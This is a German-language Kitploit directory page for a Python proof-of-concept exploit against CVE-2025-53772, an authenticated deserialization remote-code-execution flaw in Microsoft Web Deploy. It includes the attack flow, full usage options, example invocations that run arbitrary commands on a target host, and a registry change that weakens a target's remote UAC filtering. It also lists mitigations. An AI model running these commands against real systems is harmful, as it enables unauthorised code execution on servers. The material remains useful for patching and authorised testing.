Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-53772 — poc für cve-2025-53772 | Kitploit
Tools/GitHubGitHub/sailay1996/cve-2025-53772
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

poc für cve-2025-53772

Repository anzeigen
4611vor 8 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-53772 - Microsoft Web Deploy RCE Exploit

Ein Python-basierter Exploit für CVE-2025-53772, eine Remote-Codeausführungs-Schwachstelle in Microsoft Web Deploy (msdeploy), die durch unsichere Deserialisierung von HTTP-Header-Daten verursacht wird.

🎬 POC-Video

POC


Schwachstellenübersicht

EigenschaftWert
CVE-IDCVE-2025-53772
CVSS-Score8.8 (Hoch)
Betroffenes ProduktMicrosoft Web Deploy 4.0
Verwundbare Versionen< 10.0.2001
Behobene Version10.0.2001+
SchwachstellentypDeserialisierung nicht vertrauenswürdiger Daten (CWE-502)
AuthentifizierungErforderlich (geringe Berechtigungen)

Funktionsweise

Die Schwachstelle liegt in der Deserialisierung des HTTP-Headers MSDeploy.SyncOptions. Wenn eine speziell präparierte Nutzlast gesendet wird, deserialisiert der Server sie mithilfe von BinaryFormatter, was über die TypeConfuseDelegate-Gadget-Kette eine beliebige Codeausführung auslöst.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Betroffene Endpunkte

EndpunktPortProtokollAuthentifizierungstyp
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

Installation

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Anforderungen

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Verwendung

Schnellstart

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Optionen

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

Beispiele

Agent Service (Port 80 - NTLM-Authentifizierung)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc-Dienst (Port 8172 - Basisauthentifizierung)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Überprüfung

Überprüfen Sie nach dem Ausführen des Exploits die Ausführung auf dem Zielsystem:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Häufige Probleme

401 Nicht autorisiert (NTLM)

Wenn Sie den Agent Service mit NTLM verwenden und eine 401 erhalten:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Nicht gefunden (msdeploy.axd)

Der IIS-Handler ist möglicherweise nicht registriert. Verwenden Sie stattdessen den Agent-Service-Endpunkt:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Verwundbare Version überprüfen

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Gegenmaßnahmen

  1. Aktualisieren Sie Web Deploy auf Version 10.0.2001 oder höher
  2. Beschränken Sie den Zugriff auf Web-Deploy-Endpunkte über die Firewall
  3. Verwenden Sie starke Anmeldedaten und vermeiden Sie die Wiederverwendung von Passwörtern
  4. Überwachen Sie Protokolle auf verdächtige Aktivitäten auf den Ports 80/8172
  5. Deaktivieren Sie Web Deploy, wenn es nicht benötigt wird

Referenzen

  • Microsoft-Sicherheitshinweis
  • NVD - CVE-2025-53772
  • Originalrecherche von HawkTrace

Haftungsausschluss

Dieses Tool wird nur für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine entsprechende Genehmigung ein.


Lizenz

MIT-Lizenz

Tool herunterladen